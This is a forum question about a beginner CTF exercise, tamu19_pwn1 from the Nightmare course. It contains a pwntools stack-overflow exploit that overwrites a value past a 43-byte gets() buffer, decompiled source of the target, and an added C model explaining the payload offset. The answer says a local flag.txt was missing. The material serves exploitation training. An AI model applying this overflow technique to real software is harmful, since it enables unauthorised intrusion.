Flag not shown in the terminal after completing the exploit in a CTF

Question | Votes: 0 | Answers: 1

To keep it as concise as possible: I am running a Python exploit that passes all the checks it needs to, but when the original ELF is supposed to write the flag to flag.txt, nothing is displayed. I have compared (and even copied) other solutions for this challenge, but none of them actually display the flag for me. Is it a permissions problem with my empty flag.txt file?

For those who would like me to elaborate on the problem: I am new to the whole system architecture, software and technology I am using, so there may be a simple problem I am not aware of. I am currently working through guyinatuxedo's Nightmare and I am stuck on the challenge Tamu'19_pwn1. Repository: https://github.com/guyinatuxedo/nightmare/tree/master/modules/04-bof_variable/tamu19_pwn1

I am running Ubuntu 22.04 in a virtual machine and using Python 3.10.12.

I have written the script in python3:

# Import pwntools
from pwn import *

# Set the target file
target = process('./pwn1')

# Our payload should overwrite the 43 bytes (0x2b) of the input buffer and then
# write our desired value, packed as a 32-bit little-endian integer
payload = b"0"*0x2b + p32(0xdea110c8)

# Send the first two lines for the first two questions
# (pwntools tubes expect bytes, so the answers are bytes literals)
print(target.recvline()) # receive the intro
print(target.recvline()) # receive Q1
target.sendline(b"Sir Lancelot of Camelot")
print(target.recvline()) # Q2
target.sendline(b"To seek the Holy Grail.")

# Send our payload as the answer to the 3rd question
print(target.recvline()) # Q3
target.sendline(payload)

# Print the flag
print(target.recvline()) # outro
print(target.recvline()) # flag

# I used .interactive() but that did not work either
#target.interactive()

The file I am exploiting is written in C. Here is the snippet of main() from the file:

/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
/* WARNING: Removing unreachable block (ram,0x000108bb) */

undefined4 main(void)

{
  int strcmpResult0;
  int strcmpResult1;
  char input [43];
 
  setvbuf(stdout,(char *)0x2,0,0);
  puts(
      "Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see."
      );
  puts("What... is your name?");
  fgets(input,0x2b,stdin);
  strcmpResult0 = strcmp(input,"Sir Lancelot of Camelot\n");
  if (strcmpResult0 != 0) {
    puts("I don\'t know that! Auuuuuuuugh!");
                    /* WARNING: Subroutine does not return */
    exit(0);
  }
  puts("What... is your quest?");
  fgets(input,0x2b,stdin);
  strcmpResult1 = strcmp(input,"To seek the Holy Grail.\n");
  if (strcmpResult1 == 0) {
    puts("What... is my secret?");
    gets(input);
    puts("I don\'t know that! Auuuuuuuugh!");
    return 0;
  }
  puts("I don\'t know that! Auuuuuuuugh!");
                    /* WARNING: Subroutine does not return */
  exit(0);
}

I should expect this before the EOF:

flag{g0ttem_boyz}

Instead, I get a line ending, which is what my flag.txt initially contained. This is what I get in the terminal when I run the exploit:

$    python exploit.py
[+] Starting local process './pwn1': pid 12060
[*] Switching to interactive mode
[*] Process './pwn1' stopped with exit code 0 (pid 12060)
Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
What... is your name?
What... is your quest?
What... is my secret?
Right. Off you go.

[*] Got EOF while reading in interactive
$

Unfortunately, to get the best understanding of the problem, you will probably have to open the repository linked above.

Tags: binary reverse-engineering exploit ctf ghidra
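To check the payload from the question offline, here is an added example (not the challenge binary's code and not pwntools) that models the stack frame the payload relies on: a 43-byte input buffer followed, at offset 0x2b, by the 4-byte value the post writes with p32(0xdea110c8). That layout, the byte-array frame, and the FRAME_LEN cap on the simulated gets() are assumptions of this model; the binary itself only shows the 43-byte buffer, fgets(input, 0x2b, stdin) for the first two answers and gets(input) for the third.

```c
/* Added example (not the challenge binary's code, not pwntools): a model of
 * the tamu19_pwn1 stack frame and of the payload used in the question above,
 * so the 0x2b offset and the p32() packing can be checked offline.
 * ASSUMPTION: the 4-byte value the payload targets sits directly after the
 * 43-byte input buffer, which is what the post's payload relies on. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN      0x2b          /* char input[43] from the decompiled main() */
#define SECRET_OFF   BUF_LEN       /* assumed position of the targeted 4-byte value */
#define FRAME_LEN    64            /* model frame: buffer, target slot, some bytes after it */
#define TARGET_VALUE 0xdea110c8u   /* value the post's payload writes */

/* Little-endian packing, the same thing pwntools' p32() does for i386. */
static void p32(uint32_t v, unsigned char out[4]) {
    for (int i = 0; i < 4; i++) out[i] = (unsigned char)(v >> (8 * i));
}

/* Read a 32-bit stack slot the way a 32-bit x86 CPU would: little-endian. */
static uint32_t load32le(const unsigned char *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Build the post's payload: 0x2b filler bytes followed by p32(0xdea110c8).
 * Returns the payload length (0x2f), or 0 if `cap` is too small. */
size_t build_payload(unsigned char *out, size_t cap) {
    if (cap < BUF_LEN + 4) return 0;
    memset(out, '0', BUF_LEN);
    p32(TARGET_VALUE, out + BUF_LEN);
    return BUF_LEN + 4;
}

/* gets()-style copy: stops at a newline or the end of the input, never at the
 * size of the destination. The real gets() has no bound at all; the FRAME_LEN
 * cap only keeps this simulation memory-safe. Returns bytes written,
 * terminator included. */
static size_t model_gets(unsigned char *frame, const unsigned char *line, size_t len) {
    size_t i;
    for (i = 0; i < len && i < FRAME_LEN - 1 && line[i] != '\n'; i++) frame[i] = line[i];
    frame[i] = '\0';   /* gets() also writes a terminator after the last copied byte */
    return i + 1;
}

/* fgets(input, 0x2b, stdin)-style copy: at most 0x2a bytes plus a terminator,
 * keeping the newline if it fits, so it can never reach SECRET_OFF. */
static size_t model_fgets(unsigned char *frame, const unsigned char *line, size_t len) {
    size_t i = 0;
    while (i < len && i < BUF_LEN - 1) {
        frame[i] = line[i];
        i++;
        if (line[i - 1] == '\n') break;   /* fgets keeps the newline and stops */
    }
    frame[i] = '\0';
    return i + 1;
}

/* Value in the target slot after the third prompt's gets() consumes `line`.
 * The slot starts out zeroed, as a local initialised before the read would. */
uint32_t secret_after_gets(const unsigned char *line, size_t len) {
    unsigned char frame[FRAME_LEN];
    memset(frame, 0, sizeof frame);
    model_gets(frame, line, len);
    return load32le(frame + SECRET_OFF);
}

/* Value in the target slot after one of the fgets(input, 0x2b, stdin) reads. */
uint32_t secret_after_fgets(const unsigned char *line, size_t len) {
    unsigned char frame[FRAME_LEN];
    memset(frame, 0, sizeof frame);
    model_fgets(frame, line, len);
    return load32le(frame + SECRET_OFF);
}

int main(void) {
    unsigned char payload[BUF_LEN + 4];
    size_t n = build_payload(payload, sizeof payload);
    printf("payload (%zu bytes):", n);
    for (size_t i = 0; i < n; i++) printf(" %02x", payload[i]);
    printf("\nslot after gets():  0x%08x\n", secret_after_gets(payload, n));
    printf("slot after fgets(): 0x%08x\n", secret_after_fgets(payload, n));
    return 0;
}
```

The two model functions show why only the third prompt is exploitable: fgets with a size of 0x2b stops 0x2a bytes into the buffer, while gets keeps copying until a newline, so a 0x2f-byte line without a newline lands the packed value exactly on the slot after the buffer. The model also makes visible that gets writes one more byte, the NUL terminator, just past the payload, and that a stray newline anywhere inside the payload cuts the copy short.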
1 answer

0 votes

I found that the problem was my own confusion about the challenge itself. Since the challenge used to run on a server that held the flag, it now only runs locally on the machine, simulating the process of hacking the server. Therefore I needed to add a flag.txt to the local directory.
